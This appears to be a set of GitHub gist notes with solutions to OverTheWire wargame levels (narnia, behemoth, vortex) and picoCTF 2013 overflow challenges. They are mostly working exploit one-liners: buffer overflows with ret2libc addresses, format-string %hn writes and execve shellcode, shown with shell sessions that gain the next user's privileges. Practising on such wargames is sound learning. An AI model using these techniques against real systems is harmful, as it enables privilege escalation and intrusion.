Paulus Gandung Prakosa plvhx
plvhx / README.md
Last active December 22, 2016 12:52
overthewire.org narnia level4

... Because I'm too lazy to guess which 'esp' addr I must occupy... even with NX shit disabled... I resist using ret2libc...

narnia4@melinda:/narnia$ ./narnia4 $(python -c 'from struct import *;print "\x41"*(256 + 16) + pack("<I", 0xf7e61e70) + pack("<I", 0xf7e54f50) + pack("<I", 0xf7f7fa8c)')
$ id
uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4)
$ cat /etc/narnia_pass/narnia5
*********
plvhx / README.md
Created September 19, 2016 00:11
overthewire.org narnia level5
narnia5@melinda:/narnia$ ./narnia5 $(python -c 'print "\xdc\xd5\xff\xff"')'%496u%5$hn'
Change i's value from 1 -> 500. GOOD
$ cat /etc/narnia_pass/narnia6
**********
$
plvhx / README.md
Created September 19, 2016 02:12
overthewire narnia level6
narnia6@melinda:/narnia$ ./narnia6 $(python -c 'print "\x41"*(8) + "\x70\x1e\xe6\xf7"') $(python -c 'print "\x41"*(8) + "/bin/sh"')
$ id
uid=14006(narnia6) gid=14006(narnia6) euid=14007(narnia7) groups=14007(narnia7),14006(narnia6)
$ cat /etc/narnia_pass/narnia7
********
plvhx / README.md
Created September 19, 2016 02:33
overthewire.org narnia level7
narnia7@melinda:/narnia$ ./narnia7 $(python -c 'print "\x2c\xd5\xff\xff\x2e\xd5\xff\xff"')'%34558x%6$hn%33022x%7$hn'
goodfunction() = 0x80486e0
hackedfunction() = 0x8048706

before : ptrf() = 0x80486e0 (0xffffd52c)
I guess you want to come to the hackedfunction...
Way to go!!!!$ ls
narnia0    narnia1    narnia2	 narnia3    narnia4    narnia5	  narnia6    narnia7	narnia8
narnia0.c narnia1.c narnia2.c narnia3.c narnia4.c narnia5.c narnia6.c narnia7.c	narnia8.c
plvhx / README.md
Created September 19, 2016 12:09
overthewire.org behemoth level1
(python -c 'from struct import pack;print "\x41"*(67 + 12) + pack("<I", 0xf7e61e70) + pack("<I", 0xf7e54f50) + pack("<I", 0xf7f7fa8c)' 2> /dev/null; tee) | ./behemoth1
plvhx / README.md
Created September 21, 2016 02:24
overthewire.org vortex level1
vortex1@melinda:/vortex$ (python -c 'print "\\"*(257 + 4) + "\xca"'; tee) | ./vortex1
[ ... some useless garbage... ]
ls
id
uid=5002(vortex2) gid=5001(vortex1) groups=5002(vortex2),5001(vortex1)
plvhx / README.md
Last active December 22, 2016 12:50
overthewire.org vortex level2

Hint: $$ in bash is current PID :v :v

vortex2@melinda:/vortex$ mkdir /tmp/.v0
vortex2@melinda:/vortex$ ./vortex2 /etc/vortex_pass/vortex3
/bin/tar: Removing leading `/' from member names
vortex2@melinda:/vortex$ cp '/tmp/ownership.$$.tar' /tmp/.v0/.
vortex2@melinda:/vortex$ cd /tmp/.v0
vortex2@melinda:/tmp/.v0$ ls
ownership.$$.tar
plvhx / README.md
Last active December 22, 2016 12:50
overthewire.org vortex level3
vortex3@melinda:/vortex$ ./vortex3 $(python -c 'import struct;Q = lambda x: struct.pack("<I", x);print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" + "\x90"*(106) + Q(0x8049312)')
$ id
uid=5003(vortex3) gid=5003(vortex3) euid=5004(vortex4) groups=5004(vortex4),5003(vortex3)
$ 
plvhx / README.md
Created September 21, 2016 12:39
picoCTF 2013 overflow-1 re-writeup
./overflow1-3948d17028101c40 $(python -c 'import struct;print "\x41"*(0x40) + struct.pack("<I", 1)')
plvhx / README.md
Created September 21, 2016 12:48
picoCTF 2013 overflow-2 re-writeup
./overflow2-44e63640e033ff2b $(python -c 'import struct;print "\x41"*(0x40 + 16) + struct.pack("<I", 0x01)')